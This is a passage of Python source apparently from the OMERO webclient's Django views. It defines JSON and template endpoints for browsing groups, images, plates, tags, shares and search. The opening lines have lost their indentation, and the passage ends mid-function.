url = kwargs.get("load_template_url", None)
if url is None:
url = reverse(viewname="load_template", args=[menu])
# validate experimenter is in the active group
active_group = request.session.get("active_group") or conn.getEventContext().groupId
# prepare members of group...
leaders, members = conn.getObject("ExperimenterGroup", active_group).groupSummary()
userIds = [u.id for u in leaders]
userIds.extend([u.id for u in members])
# check any change in experimenter...
user_id = request.GET.get("experimenter")
if initially_open_owner is not None:
if request.session.get("user_id", None) != -1:
# if we're not already showing 'All Members'...
user_id = initially_open_owner
try:
user_id = long(user_id)
except Exception:
user_id = None
# check if user_id is in a currnt group
if user_id is not None:
if (
user_id
not in (
set(map(lambda x: x.id, leaders)) | set(map(lambda x: x.id, members))
)
and user_id != -1
):
# All users in group is allowed
user_id = None
if user_id is None:
# ... or check that current user is valid in active group
user_id = request.session.get("user_id", None)
if user_id is None or int(user_id) not in userIds:
if user_id != -1: # All users in group is allowed
user_id = conn.getEventContext().userId
request.session["user_id"] = user_id
myGroups = list(conn.getGroupsMemberOf())
myGroups.sort(key=lambda x: x.getName().lower())
groups = myGroups
new_container_form = ContainerForm()
# colleagues required for search.html page only.
myColleagues = {}
if menu == "search":
for g in groups:
g.loadLeadersAndMembers()
for c in g.leaders + g.colleagues:
myColleagues[c.id] = c
myColleagues = list(myColleagues.values())
myColleagues.sort(key=lambda x: x.getLastName().lower())
context = {
"menu": menu,
"init": init,
"myGroups": myGroups,
"new_container_form": new_container_form,
"global_search_form": global_search_form,
}
context["groups"] = groups
context["myColleagues"] = myColleagues
context["active_group"] = conn.getObject("ExperimenterGroup", long(active_group))
context["active_user"] = conn.getObject("Experimenter", long(user_id))
context["initially_select"] = show.initially_select
context["initially_open"] = show.initially_open
context["isLeader"] = conn.isLeader()
context["current_url"] = url
context["page_size"] = settings.PAGE
context["template"] = template
context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
context["current_admin_privileges"] = conn.getCurrentAdminPrivileges()
context["leader_of_groups"] = conn.getEventContext().leaderOfGroups
return context
@login_required()
@render_response()
def load_template(request, menu, conn=None, url=None, **kwargs):
    """Thin view wrapper: all context-building happens in _load_template."""
    return _load_template(request=request, menu=menu, conn=conn, url=url, **kwargs)
@login_required()
@render_response()
def group_user_content(request, url=None, conn=None, **kwargs):
    """
    Loads html content of the Groups/Users drop-down menu on main webclient
    pages.
    Url should be supplied in request, as target for redirect after switching
    group.
    """
    my_groups = sorted(conn.getGroupsMemberOf(), key=lambda g: g.getName().lower())
    if not conn.isAdmin():
        groups = my_groups
    else:
        # Admins see every group except the system 'user' and 'guest' groups
        roles = conn.getAdminService().getSecurityRoles()
        excluded = (roles.userGroupId, roles.guestGroupId)
        all_groups = conn.getObjects(
            "ExperimenterGroup", opts={"load_experimenters": True}
        )
        groups = sorted(
            (g for g in all_groups if g.getId() not in excluded),
            key=lambda g: g.getName().lower(),
        )
    for group in groups:
        group.loadLeadersAndMembers()  # load leaders / members
    return {
        "template": "webclient/base/includes/group_user_content.html",
        "current_url": url,
        "groups": groups,
        "myGroups": my_groups,
    }
@login_required()
def api_group_list(request, conn=None, **kwargs):
    """Return a JSON list of groups, optionally filtered by member."""
    # Parse query-string parameters
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        member_id = get_long_or_default(request, "member", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        marshalled = tree.marshal_groups(
            conn=conn, member_id=member_id, page=page, limit=limit
        )
        return JsonResponse({"groups": marshalled})
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
@login_required()
def api_experimenter_detail(request, experimenter_id, conn=None, **kwargs):
    """Return JSON details for one experimenter.

    A negative id denotes the virtual 'All members' experimenter.
    """
    try:
        exp_id = long(experimenter_id)
    except ValueError:
        return HttpResponseBadRequest("Invalid experimenter id")
    try:
        if exp_id < 0:
            experimenter = fake_experimenter(request)
        else:
            experimenter = tree.marshal_experimenter(
                conn=conn, experimenter_id=exp_id
            )
        if experimenter is None:
            raise Http404("No Experimenter found with ID %s" % exp_id)
        return JsonResponse({"experimenter": experimenter})
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
@login_required()
def api_container_list(request, conn=None, **kwargs):
    """Return a JSON dict of top-level containers for a group/experimenter.

    Includes projects, orphaned datasets, screens, orphaned plates and,
    when permitted or enabled, the 'orphaned images' pseudo-container.
    """
    # Get parameters
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        group_id = get_long_or_default(request, "group", -1)
        experimenter_id = get_long_or_default(request, "id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    # While this interface does support paging, it does so in a
    # very odd way. The results per page is enforced per query so this
    # will actually get the limit for projects, datasets (without
    # parents), screens and plates (without parents). This is fine for
    # the first page, but the second page may not be what is expected.
    if not conn.isValidGroup(group_id):
        return HttpResponseForbidden("Not a member of Group: %s" % group_id)
    r = dict()
    try:
        # Get the projects
        r["projects"] = tree.marshal_projects(
            conn=conn,
            group_id=group_id,
            experimenter_id=experimenter_id,
            page=page,
            limit=limit,
        )
        # Get the orphaned datasets (without project parents)
        r["datasets"] = tree.marshal_datasets(
            conn=conn,
            orphaned=True,
            group_id=group_id,
            experimenter_id=experimenter_id,
            page=page,
            limit=limit,
        )
        # Get the screens for the current user
        r["screens"] = tree.marshal_screens(
            conn=conn,
            group_id=group_id,
            experimenter_id=experimenter_id,
            page=page,
            limit=limit,
        )
        # Get the orphaned plates (without project parents)
        r["plates"] = tree.marshal_plates(
            conn=conn,
            orphaned=True,
            group_id=group_id,
            experimenter_id=experimenter_id,
            page=page,
            limit=limit,
        )
        # Get the orphaned images container
        try:
            orph_t = request.session["server_settings"]["ui"]["tree"]["orphans"]
        except Exception:
            # No such server setting in session: default to showing orphans
            orph_t = {"enabled": True}
        # Orphans are visible to admins, group leaders and the data owner,
        # or to anyone when the 'orphans' UI setting is enabled
        if (
            conn.isAdmin()
            or conn.isLeader(gid=request.session.get("active_group"))
            or experimenter_id == conn.getUserId()
            or orph_t.get("enabled", True)
        ):
            orphaned = tree.marshal_orphaned(
                conn=conn,
                group_id=group_id,
                experimenter_id=experimenter_id,
                page=page,
                limit=limit,
            )
            orphaned["name"] = orph_t.get("name", "Orphaned Images")
            r["orphaned"] = orphaned
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse(r)
@login_required()
def api_dataset_list(request, conn=None, **kwargs):
    """Return a JSON list of datasets, optionally under a given project."""
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        group_id = get_long_or_default(request, "group", -1)
        project_id = get_long_or_default(request, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not conn.isValidGroup(group_id):
        return HttpResponseForbidden("Not a member of Group: %s" % group_id)
    try:
        marshalled = tree.marshal_datasets(
            conn=conn,
            project_id=project_id,
            group_id=group_id,
            page=page,
            limit=limit,
        )
        return JsonResponse({"datasets": marshalled})
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
@login_required()
def api_image_list(request, conn=None, **kwargs):
    """Get a list of images

    Specifying dataset_id will return only images in that dataset
    Specifying experimenter_id will return orphaned images for that
    user
    The orphaned images will include images which belong to the user
    but are not in any dataset belonging to the user
    Currently specifying both, experimenter_id will be ignored
    """
    # Get parameters
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        group_id = get_long_or_default(request, "group", -1)
        dataset_id = get_long_or_default(request, "id", None)
        orphaned = get_bool_or_default(request, "orphaned", False)
        load_pixels = get_bool_or_default(request, "sizeXYZ", False)
        thumb_version = get_bool_or_default(request, "thumbVersion", False)
        date = get_bool_or_default(request, "date", False)
        experimenter_id = get_long_or_default(request, "experimenter_id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not conn.isValidGroup(group_id):
        return HttpResponseForbidden("Not a member of Group: %s" % group_id)
    # Share ID is in kwargs from api/share_images/<id>/ which will create
    # a share connection in @login_required.
    # We don't support ?share_id in query string since this would allow a
    # share connection to be created for ALL urls, instead of just this one.
    # (Conditional expression replaces the old "cond and x or y" idiom,
    # which would have mapped a share id of 0 to None.)
    share_id = long(kwargs["share_id"]) if "share_id" in kwargs else None
    try:
        # Get the images
        images = tree.marshal_images(
            conn=conn,
            orphaned=orphaned,
            experimenter_id=experimenter_id,
            dataset_id=dataset_id,
            share_id=share_id,
            load_pixels=load_pixels,
            group_id=group_id,
            page=page,
            date=date,
            thumb_version=thumb_version,
            limit=limit,
        )
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    return JsonResponse({"images": images})
@login_required()
def api_plate_list(request, conn=None, **kwargs):
    """Return a JSON list of plates, optionally under a given screen."""
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        group_id = get_long_or_default(request, "group", -1)
        screen_id = get_long_or_default(request, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if not conn.isValidGroup(group_id):
        return HttpResponseForbidden("Not a member of Group: %s" % group_id)
    try:
        marshalled = tree.marshal_plates(
            conn=conn,
            screen_id=screen_id,
            group_id=group_id,
            page=page,
            limit=limit,
        )
        return JsonResponse({"plates": marshalled})
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
@login_required()
def api_plate_acquisition_list(request, conn=None, **kwargs):
    """Return a JSON list of plate acquisitions (runs) for one plate."""
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        plate_id = get_long_or_default(request, "id", None)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    # PlateAcquisitions can never be orphaned, so a plate id is required
    if plate_id is None:
        return HttpResponseBadRequest("id (plate) must be specified")
    try:
        acquisitions = tree.marshal_plate_acquisitions(
            conn=conn, plate_id=plate_id, page=page, limit=limit
        )
        return JsonResponse({"acquisitions": acquisitions})
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
def get_object_links(conn, parent_type, parent_id, child_type, child_ids):
    """ This is just used internally by api_link DELETE below """
    if parent_type == "orphaned":
        return None
    if parent_type == "experimenter" and child_type in ("dataset", "plate", "tag"):
        # A requested unlink from the de facto orphaned container:
        # not an error, but there is no actual link to remove
        return None
    # Dispatch table: (parent, child) pair -> HQL link class name
    link_classes = {
        ("project", "dataset"): "ProjectDatasetLink",
        ("dataset", "image"): "DatasetImageLink",
        ("screen", "plate"): "ScreenPlateLink",
        ("tagset", "tag"): "AnnotationAnnotationLink",
    }
    link_type = link_classes.get((parent_type, child_type))
    if not link_type:
        raise Http404("json data needs 'parent_type' and 'child_type'")
    params = omero.sys.ParametersI()
    params.addIds(child_ids)
    # Need to fetch child and parent, otherwise
    # AnnotationAnnotationLink is not loaded
    query = (
        """
    from %s olink join fetch olink.child join fetch olink.parent
    where olink.child.id in (:ids)
    """
        % link_type
    )
    if parent_id:
        params.add("pid", rlong(parent_id))
        query += " and olink.parent.id = :pid"
    found = conn.getQueryService().findAllByQuery(query, params, conn.SERVICE_OPTS)
    if parent_id is not None and len(found) == 0:
        raise Http404(
            "No link found for %s-%s to %s-%s"
            % (parent_type, parent_id, child_type, child_ids)
        )
    return link_type, found
def create_link(parent_type, parent_id, child_type, child_id):
    """ This is just used internally by api_link DELETE below """
    if parent_type == "experimenter" and child_type in ("dataset", "plate"):
        # Not a real link: the dataset/plate simply becomes an orphan
        return "orphan"
    if parent_type == "project" and child_type == "dataset":
        link = ProjectDatasetLinkI()
        link.setParent(ProjectI(long(parent_id), False))
        link.setChild(DatasetI(long(child_id), False))
        return link
    if parent_type == "dataset" and child_type == "image":
        link = DatasetImageLinkI()
        link.setParent(DatasetI(long(parent_id), False))
        link.setChild(ImageI(long(child_id), False))
        return link
    if parent_type == "screen" and child_type == "plate":
        link = ScreenPlateLinkI()
        link.setParent(ScreenI(long(parent_id), False))
        link.setChild(PlateI(long(child_id), False))
        return link
    if parent_type == "tagset" and child_type == "tag":
        link = AnnotationAnnotationLinkI()
        link.setParent(TagAnnotationI(long(parent_id), False))
        link.setChild(TagAnnotationI(long(child_id), False))
        return link
    # No link type defined for this parent/child combination
    return None
def get_objects_owners(conn, child_type, child_ids):
    """
    Returns a dict of child_id: owner_id
    """
    # 'tag' objects are looked up as Annotations
    obj_type = "Annotation" if child_type == "tag" else child_type
    return {
        obj.id: obj.details.owner.id.val
        for obj in conn.getObjects(obj_type, child_ids)
    }
@login_required()
def api_links(request, conn=None, **kwargs):
    """
    Entry point for the api_links methods.
    We delegate depending on request method to
    create or delete links between objects.
    """
    if request.method == "POST":
        handler = _api_links_POST
    elif request.method == "DELETE":
        handler = _api_links_DELETE
    else:
        return JsonResponse(
            {"Error": "Need to POST or DELETE JSON data to update links"}, status=405
        )
    # Parse the JSON body, then dispatch
    try:
        json_data = json.loads(request.body)
    except TypeError:
        # for Python 3.5
        json_data = json.loads(bytes_to_native_str(request.body))
    return handler(conn, json_data)
def _api_links_POST(conn, json_data, **kwargs):
    """Creates links between objects specified by a json
    blob in the request body.
    e.g. {"dataset":{"10":{"image":[1,2,3]}}}
    When creating a link, fails silently if ValidationException
    (E.g. adding an image to a Dataset that already has that image).
    """
    response = {"success": False}
    # json is [parent_type][parent_id][child_type][childIds]
    # e.g. {"dataset":{"10":{"image":[1,2,3]}}}
    linksToSave = []
    write_owned = "WriteOwned" in conn.getCurrentAdminPrivileges()
    user_id = conn.getUserId()
    for parent_type, parents in json_data.items():
        # orphaned/experimenter 'parents' need no real link (see create_link)
        if parent_type in ("orphaned", "experimenter"):
            continue
        for parent_id, children in parents.items():
            for child_type, child_ids in children.items():
                # batch look-up owners of all child objects
                child_owners = get_objects_owners(conn, child_type, child_ids)
                for child_id in child_ids:
                    parent_id = int(parent_id)
                    link = create_link(parent_type, parent_id, child_type, child_id)
                    if link and link != "orphan":
                        # link owner should match child owner
                        if write_owned and child_owners[child_id] != user_id:
                            link.details.owner = ExperimenterI(
                                child_owners[child_id], False
                            )
                        linksToSave.append(link)
    if len(linksToSave) > 0:
        # Need to set context to correct group (E.g parent group)
        # NOTE(review): parent_type/parent_id here are whatever the LAST loop
        # iteration left behind - this assumes all links share that parent's
        # group. Confirm before refactoring the loops above.
        ptype = parent_type.title()
        if ptype in ["Tagset", "Tag"]:
            ptype = "TagAnnotation"
        p = conn.getQueryService().get(ptype, parent_id, conn.SERVICE_OPTS)
        conn.SERVICE_OPTS.setOmeroGroup(p.details.group.id.val)
        logger.info("api_link: Saving %s links" % len(linksToSave))
        try:
            # We try to save all at once, for speed.
            conn.saveArray(linksToSave)
            response["success"] = True
        except Exception:
            logger.info(
                "api_link: Exception on saveArray with %s links" % len(linksToSave)
            )
            # If this fails, e.g. ValidationException because link
            # already exists, try to save individual links
            for link in linksToSave:
                try:
                    conn.saveObject(link)
                except Exception:
                    # deliberate best-effort: duplicates are silently skipped
                    pass
            response["success"] = True
    return JsonResponse(response)
def _api_links_DELETE(conn, json_data):
    """Deletes links between objects specified by a json
    blob in the request body.
    e.g. {"dataset":{"10":{"image":[1,2,3]}}}

    Returns {"success": True} plus, for each child, any remaining links to
    OTHER parents (so the webclient can tell what is now orphaned).
    """
    response = {"success": False}
    # json is [parent_type][parent_id][child_type][childIds]
    # e.g. {"dataset":{"10":{"image":[1,2,3]}}}
    for parent_type, parents in json_data.items():
        if parent_type == "orphaned":
            continue
        for parent_id, children in parents.items():
            for child_type, child_ids in children.items():
                objLnks = get_object_links(
                    conn, parent_type, parent_id, child_type, child_ids
                )
                # None means there was no real link to delete (see helper)
                if objLnks is None:
                    continue
                linkType, links = objLnks
                linkIds = [r.id.val for r in links]
                logger.info("api_link: Deleting %s links" % len(linkIds))
                conn.deleteObjects(linkType, linkIds, wait=True)
                # webclient needs to know what is orphaned
                linkType, remainingLinks = get_object_links(
                    conn, parent_type, None, child_type, child_ids
                )
                # return remaining links in same format as json above
                # e.g. {"dataset":{"10":{"image":[1,2,3]}}}
                for rl in remainingLinks:
                    pid = rl.parent.id.val
                    cid = rl.child.id.val
                    # Deleting links still in progress above - ignore these
                    if pid == int(parent_id):
                        continue
                    if parent_type not in response:
                        response[parent_type] = {}
                    if pid not in response[parent_type]:
                        response[parent_type][pid] = {child_type: []}
                    response[parent_type][pid][child_type].append(cid)
    # If we got here, DELETE was OK
    response["success"] = True
    return JsonResponse(response)
@login_required()
def api_parent_links(request, conn=None, **kwargs):
    """
    Get a list of links as
    {'data': [{id: 12, child:{type:'image', id:1},
    parent:{type:'dataset', id:2}] }
    Supports ?image=1,2 and ?image=1&image=2
    """
    parent_types = {"image": "dataset", "dataset": "project", "plate": "screen"}
    parents = []
    for child_type, parent_type in parent_types.items():
        raw_values = request.GET.getlist(child_type)
        if not raw_values:
            continue
        # flatten comma-separated values: ?image=1,2
        child_ids = [part for value in raw_values for part in value.split(",")]
        link_type, found = get_object_links(
            conn, parent_type, None, child_type, child_ids
        )
        for link in found:
            parents.append(
                {
                    "id": link.id.val,
                    "parent": {"type": parent_type, "id": link.parent.id.val},
                    "child": {"type": child_type, "id": link.child.id.val},
                }
            )
    return JsonResponse({"data": parents})
@login_required()
def api_paths_to_object(request, conn=None, **kwargs):
    """
    This finds the paths to objects in the hierarchy. It returns only
    the path, not the object hierarchy itself.
    An example usage is for the 'show' functionality
    Example to go to the image with id 1 somewhere in the tree.
    http://localhost:8000/webclient/?show=image-1
    This method can tell the webclient exactly what needs to be
    dynamically loaded to display this in the jstree.
    """
    try:
        ids = {}
        for name in (
            "experimenter",
            "project",
            "dataset",
            "image",
            "screen",
            "plate",
            "run",
            "tag",
            "tagset",
            "roi",
            "shape",
            "group",
        ):
            ids[name] = get_long_or_default(request, name, None)
        # 'acquisition' and 'run' are synonyms; 'acquisition' wins if both
        acquisition_id = get_long_or_default(request, "acquisition", ids["run"])
        # NOTE: 'well' is passed through as the raw query-string value
        well_id = request.GET.get("well", None)
        page_size = get_long_or_default(request, "page_size", settings.PAGE)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    if ids["tag"] is not None or ids["tagset"] is not None:
        paths = paths_to_tag(conn, ids["experimenter"], ids["tagset"], ids["tag"])
    else:
        paths = paths_to_object(
            conn,
            ids["experimenter"],
            ids["project"],
            ids["dataset"],
            ids["image"],
            ids["screen"],
            ids["plate"],
            acquisition_id,
            well_id,
            ids["group"],
            page_size,
            ids["roi"],
            ids["shape"],
        )
    return JsonResponse({"paths": paths})
@login_required()
def api_tags_and_tagged_list(request, conn=None, **kwargs):
    """Dispatch to the GET (list) or DELETE (remove) tag handlers.

    Previously any other HTTP verb fell through returning None, which
    Django turns into a server error; now respond 405 like api_links.
    """
    if request.method == "GET":
        return api_tags_and_tagged_list_GET(request, conn, **kwargs)
    elif request.method == "DELETE":
        return api_tags_and_tagged_list_DELETE(request, conn, **kwargs)
    return JsonResponse(
        {"Error": "Need to GET or DELETE to list or delete tags"}, status=405
    )
def api_tags_and_tagged_list_GET(request, conn=None, **kwargs):
    """Get a list of tags

    Specifying tag_id will return any sub-tags, sub-tagsets and
    objects tagged with that id
    If no tagset_id is specified it will return tags which have no
    parent
    """
    # Parse query-string parameters
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        group_id = get_long_or_default(request, "group", -1)
        tag_id = get_long_or_default(request, "id", None)
        experimenter_id = get_long_or_default(request, "experimenter_id", -1)
        orphaned = get_bool_or_default(request, "orphaned", False)
        load_pixels = get_bool_or_default(request, "sizeXYZ", False)
        date = get_bool_or_default(request, "date", False)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    try:
        if tag_id is None:
            tagged = {}
        else:
            # ALL data (all owners) under the specified tag
            tagged = tree.marshal_tagged(
                conn=conn,
                experimenter_id=experimenter_id,
                tag_id=tag_id,
                group_id=group_id,
                page=page,
                load_pixels=load_pixels,
                date=date,
                limit=limit,
            )
        # child tags under tag_id (or top-level tags when tag_id is None)
        tagged["tags"] = tree.marshal_tags(
            conn=conn,
            orphaned=orphaned,
            experimenter_id=experimenter_id,
            tag_id=tag_id,
            group_id=group_id,
            page=page,
            limit=limit,
        )
        return JsonResponse(tagged)
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
def api_tags_and_tagged_list_DELETE(request, conn=None, **kwargs):
    """Delete the listed tags by ids.

    Returns an empty JSON body on success, or a 4xx/5xx response on failure.
    """
    # Get parameters
    try:
        tag_ids = get_longs(request, "id")
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    dcs = list()
    handle = None
    try:
        # Build one Delete command per tag and submit them as a batch
        for tag_id in tag_ids:
            dcs.append(omero.cmd.Delete("/Annotation", tag_id))
        doall = omero.cmd.DoAll()
        doall.requests = dcs
        handle = conn.c.sf.submit(doall, conn.SERVICE_OPTS)
        try:
            conn._waitOnCmd(handle)
        finally:
            handle.close()
    except CmdError as e:
        return HttpResponseBadRequest(e.message)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
    # BUG FIX: JsonResponse only serializes dicts unless safe=False, so the
    # previous JsonResponse("") raised TypeError (a 500) even on success.
    return JsonResponse("", safe=False)
@login_required()
def api_annotations(request, conn=None, **kwargs):
    """Return annotations (and their experimenters) for the given objects."""
    query = request.GET
    anns, exps = tree.marshal_annotations(
        conn,
        project_ids=get_list(request, "project"),
        dataset_ids=get_list(request, "dataset"),
        image_ids=get_list(request, "image"),
        screen_ids=get_list(request, "screen"),
        plate_ids=get_list(request, "plate"),
        run_ids=get_list(request, "acquisition"),
        well_ids=get_list(request, "well"),
        ann_type=query.get("type", None),
        ns=query.get("ns", None),
        page=get_long_or_default(request, "page", 1),
        limit=get_long_or_default(request, "limit", ANNOTATIONS_LIMIT),
    )
    return JsonResponse({"annotations": anns, "experimenters": exps})
@login_required()
def api_share_list(request, conn=None, **kwargs):
    """Return JSON lists of shares and discussions."""
    try:
        page = get_long_or_default(request, "page", 1)
        limit = get_long_or_default(request, "limit", settings.PAGE)
        member_id = get_long_or_default(request, "member_id", -1)
        owner_id = get_long_or_default(request, "owner_id", -1)
    except ValueError:
        return HttpResponseBadRequest("Invalid parameter value")
    # Like with api_container_list, this is a combination of
    # results which will each be able to return up to the limit in page
    # size
    filter_args = dict(
        conn=conn, member_id=member_id, owner_id=owner_id, page=page, limit=limit
    )
    try:
        shares = tree.marshal_shares(**filter_args)
        discussions = tree.marshal_discussions(**filter_args)
        return JsonResponse({"shares": shares, "discussions": discussions})
    except ApiUsageException as e:
        return HttpResponseBadRequest(e.serverStackTrace)
    except ServerError as e:
        return HttpResponseServerError(e.serverStackTrace)
    except IceException as e:
        return HttpResponseServerError(e.message)
@login_required()
@render_response()
def load_plate(request, o1_type=None, o1_id=None, conn=None, **kwargs):
    """
    This loads data for the center panel, via AJAX calls.
    Used for Datasets, Plates & Orphaned Images.
    """
    # get index of the plate
    index = getIntOrDefault(request, "index", 0)
    # prepare data. E.g. kw = {} or {'plate': 301L} or
    # 'acquisition': 301L}
    kw = dict()
    if o1_type is not None:
        if o1_id is not None and int(o1_id) > 0:
            kw[str(o1_type)] = long(o1_id)
    try:
        manager = BaseContainer(conn, **kw)
    except AttributeError as x:
        return handlerInternalError(request, x)
    # prepare forms
    form_well_index = None
    context = {"manager": manager, "form_well_index": form_well_index, "index": index}
    # load data & template
    template = None
    if "plate" in kw or "acquisition" in kw:
        fields = manager.getNumberOfFields()
        if fields is not None:
            form_well_index = WellIndexForm(initial={"index": index, "range": fields})
            # index 0 means 'unspecified': default to the first field
            if index == 0:
                index = fields[0]
        # Show parameter will be well-1|well-2
        show = request.GET.get("show")
        if show is not None:
            wells_to_select = []
            for w in show.split("|"):
                if "well-" in w:
                    wells_to_select.append(w.replace("well-", ""))
            context["select_wells"] = ",".join(wells_to_select)
        context["baseurl"] = reverse("webgateway").rstrip("/")
        # overwrite the placeholders set above now that index/form are known
        context["form_well_index"] = form_well_index
        context["index"] = index
        context["thumbnails_batch"] = settings.THUMBNAILS_BATCH
        template = "webclient/data/plate.html"
    if o1_type == "acquisition":
        context["acquisition"] = o1_id
    context["isLeader"] = conn.isLeader()
    # template stays None for non-plate/acquisition requests
    context["template"] = template
    return context
@login_required()
@render_response()
def load_chgrp_groups(request, conn=None, **kwargs):
    """
    Get the potential groups we can move selected data to.
    These will be groups that the owner(s) of selected objects is a member of.
    Objects are specified by query string like: ?Image=1,2&Dataset=3
    If no selected objects are specified, simply list the groups that the
    current user is a member of.
    Groups list will exclude the 'current' group context.
    """
    ownerIds = []
    currentGroups = set()
    groupSets = []
    groups = {}
    owners = {}
    # Collect the owners and groups of all selected objects
    for dtype in ("Project", "Dataset", "Image", "Screen", "Plate"):
        oids = request.GET.get(dtype, None)
        if oids is not None:
            for o in conn.getObjects(dtype, oids.split(",")):
                ownerIds.append(o.getDetails().owner.id.val)
                currentGroups.add(o.getDetails().group.id.val)
    ownerIds = list(set(ownerIds))
    # In case we were passed no objects or they weren't found
    if len(ownerIds) == 0:
        ownerIds = [conn.getUserId()]
    for owner in conn.getObjects(
        "Experimenter", ownerIds, opts={"load_experimentergroups": True}
    ):
        # Each owner has a set of groups
        gids = []
        owners[owner.id] = owner.getFullName()
        for group in owner.copyGroupExperimenterMap():
            groups[group.parent.id.val] = group.parent
            gids.append(group.parent.id.val)
        groupSets.append(set(gids))
    # Can move to groups that all owners are members of...
    targetGroupIds = set.intersection(*groupSets)
    # ...but not 'user' group
    userGroupId = conn.getAdminService().getSecurityRoles().userGroupId
    if userGroupId in targetGroupIds:
        targetGroupIds.remove(userGroupId)
    # if all the Objects are in a single group, exclude it from the target
    # groups
    if len(currentGroups) == 1:
        curr_grp = currentGroups.pop()
        if curr_grp in targetGroupIds:
            targetGroupIds.remove(curr_grp)

    def getPerms(group):
        # Summarise a group's permissions for the JSON response
        p = group.getDetails().permissions
        return {
            "write": p.isGroupWrite(),
            "annotate": p.isGroupAnnotate(),
            "read": p.isGroupRead(),
        }

    # From groupIds, create a list of group dicts for json
    targetGroups = []
    for gid in targetGroupIds:
        targetGroups.append(
            {"id": gid, "name": groups[gid].name.val, "perms": getPerms(groups[gid])}
        )
    targetGroups.sort(key=lambda x: x["name"])
    owners = [[k, v] for k, v in owners.items()]
    return {"owners": owners, "groups": targetGroups}
@login_required()
@render_response()
def load_chgrp_target(request, group_id, target_type, conn=None, **kwargs):
    """Load a tree for the user to pick a target Project, Dataset or Screen."""
    # filter by group (not switching group)
    conn.SERVICE_OPTS.setOmeroGroup(int(group_id))
    manager = BaseContainer(conn)
    manager.listContainerHierarchy(getIntOrDefault(request, "owner", None))
    return {
        "manager": manager,
        "target_type": target_type,
        "template": "webclient/data/chgrp_target_tree.html",
    }
@login_required()
@render_response()
def load_searching(request, form=None, conn=None, **kwargs):
    """
    Handles AJAX calls to search
    """
    manager = BaseSearch(conn)
    foundById = []
    # form = 'form' if we are searching. Get query from request...
    r = request.GET
    if form is not None:
        query_search = r.get("query", None)
        if query_search is None:
            return HttpResponse("No search '?query' included")
        query_search = query_search.replace("+", " ")
        advanced = toBoolean(r.get("advanced"))
        # If this is an advanced search use 'advanced_search' for query
        if advanced:
            query_search = r.get("advanced_search")
        template = "webclient/search/search_details.html"
        onlyTypes = r.getlist("datatype")
        fields = r.getlist("field")
        searchGroup = r.get("searchGroup", None)
        ownedBy = r.get("ownedBy", None)
        useAcquisitionDate = toBoolean(r.get("useAcquisitionDate"))
        # NOTE(review): the "x and y or z" idiom below also maps an empty
        # string to None, which here appears intentional
        startdate = r.get("startdateinput", None)
        startdate = startdate is not None and smart_str(startdate) or None
        enddate = r.get("enddateinput", None)
        enddate = enddate is not None and smart_str(enddate) or None
        date = None
        if startdate is not None:
            if enddate is None:
                # default the end of the range to today
                n = datetime.datetime.now()
                enddate = "%s-%02d-%02d" % (n.year, n.month, n.day)
            date = "%s_%s" % (startdate, enddate)
        # by default, if user has not specified any types:
        if len(onlyTypes) == 0:
            onlyTypes = ["images"]
        # search is carried out and results are stored in
        # manager.containers.images etc.
        manager.search(
            query_search,
            onlyTypes,
            fields,
            searchGroup,
            ownedBy,
            useAcquisitionDate,
            date,
            rawQuery=advanced,
        )
        # if the query is only numbers (separated by commas or spaces)
        # we search for objects by ID
        isIds = re.compile(r"^[\d ,]+$")
        if isIds.search(query_search) is not None:
            # search across all groups for the given IDs
            conn.SERVICE_OPTS.setOmeroGroup(-1)
            idSet = set()
            for queryId in re.split(" |,", query_search):
                if len(queryId) == 0:
                    continue
                try:
                    searchById = long(queryId)
                    if searchById in idSet:
                        continue
                    idSet.add(searchById)
                    for t in onlyTypes:
